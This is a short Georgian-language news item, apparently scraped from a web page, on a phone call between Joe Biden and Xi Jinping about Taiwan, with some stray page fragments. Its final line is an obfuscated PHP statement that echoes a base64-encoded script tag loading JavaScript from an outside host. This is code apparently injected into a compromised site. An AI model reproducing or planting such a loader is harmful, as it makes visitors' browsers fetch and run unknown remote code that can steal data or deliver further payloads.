celsiusi
ავერსი შნაიდერი
აშშ-ის პრეზიდენტმა ჯო ბაიდენმა ჩინელ კოლეგასთან, სი ძინპინთან დღეს სატელეფონო საუბარი გამართა, რომელიც ორ საათსა და 17 წუთს გაგრძელდა. ლიდერებს შორის დისკუსია ვრცლად შეეხო ტაივანის საკითხს.
 
თეთრი სახლის მიერ გავრცელებულ განცხადებაში ნათქვამია, რომ ტაივანთან დაკავშირებით პრეზიდენტმა ბაიდენმა ხაზგასმით აღნიშნა, რომ შეერთებული შტატების პოლიტიკა არ შეცვლილა და ოფიციალური ვაშინგტონი მტკიცედ ეწინააღმდეგება სტატუს კვოს შეცვლის ან ტაივანის სრუტეზე მშვიდობისა და სტაბილურობის ძირის გამოთხრის ცალმხრივ ძალისხმევებს.
 
ჩინეთის სახელმწიფო საინფორმაციო სააგენტოს ცნობით, კი სი ძინპინმა ჯო ბაიდენს განუცხადა, რომ „თუ ცეცხლს ეთამაშები, დაიწვები. იმედი მაქვს, აშშ-ს მხარე ამას ნათლად დაინახავს". 
 
 
639
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");